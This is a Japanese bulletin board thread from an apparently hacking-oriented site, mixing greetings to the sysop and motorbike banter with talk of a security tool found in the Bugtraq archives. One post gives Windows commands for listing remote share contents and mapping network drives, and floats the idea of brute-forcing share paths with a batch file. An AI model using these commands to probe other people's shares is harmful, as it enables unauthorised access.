ＢＢＳもできて、タイトルロゴもかっこいいですね。（写真のネガのやつ）
前のコンテンツがまたそろうことを祈ってます~。

の項目に、おしゃれ１号と東風荘２重起動を加えました。

ゃられたぁ〜
　もう駄目です。

気づくのが遅かったかもしれませんが
リニューアルされてますね
きえてしまったかとおもってたので
ちょっと（嬉）

> 何気なくPCComputingを読んでいたらここのサイトが載ってました（笑）
> しかもhttp://www.defcon.org/だし（笑）
> ところでおしゃれ１号ってどこを探してもないですね。

ども。
おしゃれ１号はBugtraqの過去ログに載っています。
PacketStormSecurityにもありますよ。

つーか、ここにないってのはヘンですね(笑)
あとでアップしておきます。

ヽ( ´ー`)ノ

参考：04月11日(日)03時52分23秒

何気なくPCComputingを読んでいたらここのサイトが載ってました（笑）
しかもhttp://www.defcon.org/だし（笑）
ところでおしゃれ１号ってどこを探してもないですね。
探し疲れたのでぴーこしながらビデオでも見よ
プレクスターのR-820はやっぱりいいですね

最近知ったＤＯＳコマンド編

dir /B /S /A:-D \\MachineName\共有名
ちなみに、Win95(98も？)だと、UNC対応していないというメッセージ
が吐かれて無効です。WinNT3.51以上だと有効。
＃ぃゃ、なんとなく。

Net USE u: \\machine\共有名
Net USE u: /DELETE
コマンドからの、ネットワークドライブ割り当て（解除）。
＃ぃゃ、これもなんとなく。

ぁぁ、なんかｂａｔで、共有パスのブルートできる気がしてきた。

東風荘の複数起動の仕方もう一回ＵＰしてくださると嬉しいです。

(｀▽´)/
＃なんか、湖畔で書くの久しぶりっ

なかみ復活お待ちしています

そーか。…よかった…。

掲示板が出来たのですね、これからも
ご健勝お祈り申し上げますわ　はあと
たまには虐めてやって下さいね（笑）

> 
> 　最高につまらん(笑)
> 

分かってくれて嬉しいよ。（笑い

参考：04月10日(土)03時40分45秒

> 
> バイクネタボケつーことで、
> RZは4L3ですか？29Lですか？
> 私のは4L3でした。
> っていうか、
> ツーリング行きたいなぁ・・・。

　最高につまらん(笑)

参考：04月10日(土)03時32分53秒

> ども、SYSOPのRZです。
> とりあえずRZっていう名前がホンモノってことで。 

バイクネタボケつーことで、
RZは4L3ですか？29Lですか？
私のは4L3でした。
っていうか、
ツーリング行きたいなぁ・・・。

参考：04月10日(土)03時27分29秒

はっくしないでください

昼の部本店色は目にやさしいぞ。
マジで。
リラクゼーション効果あるだろ

ﾌﾞﾝ＼_(-_- 彡 -_-)_/ﾌﾞﾝ

ども、SYSOPのRZです。
とりあえずRZっていう名前がホンモノってことで。

適当に何か面白い話でも。
わからない事があれば何でもどうぞ。
いずれＦＡＱにて回答すると思います。

では。

カイコクシテクダサァ〜ィ
ココデハ　お茶も　ダサナイノデスカァ？
カイコク　シテクダサァイ

あれだあれ 黒いよ チミ

おおおおおお
本店色っすね


うはははは

コワイコワイ(>_<)ﾋｰ

ぐふ。

以上は、現在登録されている新着順1番目から229番目までの記事です。これ以下の記事はありません。

---

MiniBBS v7.5 is Free.